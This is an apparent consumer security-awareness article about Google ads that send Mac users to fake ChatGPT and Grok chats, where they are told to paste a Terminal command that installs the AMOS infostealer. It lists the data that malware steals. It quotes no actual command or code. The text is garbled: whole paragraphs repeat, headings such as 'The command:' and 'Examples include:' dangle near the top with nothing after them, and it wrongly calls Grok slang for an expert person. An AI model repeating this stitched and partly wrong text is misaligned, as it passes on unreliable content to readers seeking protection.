Have you ever clicked on a Google Advertisement (Ad) believing it to be credible and useful? Most of us have clicked Google ads like this at some point. Hackers are currently relying on this method to exploit Mac users with bogus ChatGPT and Grok articles to distribute malicious software.
These fake chats provide the user with instructions on how to copy/paste a command line (Terminal) into their Mac's Terminal window. Unfortunately, the command installs the Trojan which allows hackers to access your device without you knowing it. Therefore once you enter this command, your nightmare has just begun!
Then what happens? The command:
Examples include:
How Do These Scams Function?
The scam uses a very smart approach. Hackers pay for Google Ads when people are looking for answers regarding common Mac problems, like "How to delete system data from my Mac." The ad directs the user to a fake ChatGPT or Grok (Grok is the slang term used on the internet today for a person who is well versed in a certain area of expertise.) chat service which looks completely legitimate, as well as offers assistance and guidance.These fake chats provide the user with instructions on how to copy/paste a command line (Terminal) into their Mac's Terminal window. Unfortunately, the command installs the Trojan which allows hackers to access your device without you knowing it. Therefore once you enter this command, your nightmare has just begun!
Then what happens? The command:
- Requests a Mac password
- Uses your password to have total access to your entire system
- Downloads and installs the AMOS infostealer malware
- Stealing all private information stored on your computer
What Does This Malware Steal?
This malware aims to steal important information.Examples include:
- Browsing history and saved passwords
- Cookies and login sessions
- Wallet keys and cryptocurrency wallets
- Personal documents, computer specifications, etc.
